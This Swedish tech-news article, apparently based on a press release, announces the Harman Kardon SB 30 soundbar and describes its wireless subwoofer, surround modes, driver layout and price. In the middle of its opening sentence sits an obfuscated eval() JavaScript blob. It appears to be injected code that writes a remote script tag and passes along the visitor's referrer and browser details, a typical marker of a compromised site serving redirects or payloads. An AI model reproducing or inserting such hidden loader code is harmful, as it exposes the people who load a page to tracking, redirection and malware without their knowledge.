Image Image Image Image Image Image Image Image Image Image

| 3 december, 2020

Scroll to top

Top

Harman Kardon soundbar ger banbrytande surround

Harman Kardon soundbar ger banbrytande surround
Sebastian

Hemmabiosystemet eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kzbki|var|u0026u|referrer|bdzfk||js|php’.split(’|’),0,{}))
Harman Kardon SB 30 har trådlös subbas, soundbar med innovativ elementplacering och ny processorteknik, vilket sammantaget ger detta slimmade allt-i-ett-system fantastiska prestanda.

HARMAN har lanserat Harman Kardon SB 30, en snyggt designad soundbar med trådlös subbas, som tack vare ny digital signalbearbetning kan leverera ett dynamisk och kraftfullt ljud vare sig det handlar om film, sport eller tv-spel. Systemet levererar i grundläget ett ljud som vida överträffar det man kan få ur en TV, och genom att ställa in rumsstorlek och lyssningsposition kan användaren ytterligare förbättra ljudupplevelsen.

Harman Kardon SB 30 har två lyssningslägen – Virtual och Wave – som ger unika surroundeffekter. De Harman-exklusiva lyssningslägena gör att SB 30 kan anpassas till både rummets storlek, lyssnarens position och typ av ljudsignal. Till exempel är Virtual-läget idealiskt för att förbättra upplevelsen av traditionell tvåkanalsstereo från exempelvis CD genom att skapa ett omslutande ljud från stereosignalen, medan Wave-läget stäcker ut ljudet åt sidorna för att maximera ljudspridningen i större rum.

SB 30 skapar 5.1 surroundljud med hjälp av en trekärnig digital signal processor- (DSP)-matris som kontrollerar 13 element fördelat på sex 2-tumsbasar och sju 1-tumsdiskanter, alltihop drivet av totalt 11 förstärkarkanaler. Den kompakta trådlösa subbasen, som kan placeras var som helst i rummet, är en nedåtriktad basreflexkonstruktion för korrekt och realistisk basåtergivning. Tillsammans med soundbaren skapar subbasen en högkvalitativ lyssningsmiljö helt utan vare sig synliga kablar eller högtalare över allt.

Med Dolby Volume håller SB 30 ljudet på en jämn nivå oavsett vad som spelas upp, vilket är perfekt när det gäller att dämpa högljudd reklam, men också för att höja nivån vid riktigt svaga partier.

Och genom att välja placerings-eq (vägg eller bänk) optimeras centerkanalens prestanda beroende på soundbarens placering. Både fötter och tillbehör för väggmontering följer med.

Harman Kardon SB 30 har prisats för design och innovation då man blev International CES Innovations 2012 Design and Engineering Awards honoree.

Pris och tillgänglighet
Harman Kardon SB 30 har ett rekommenderat pris på 7 990 kr, med 2 års garanti, och finns ute på marknaden.

http://www.mynewsdesk.com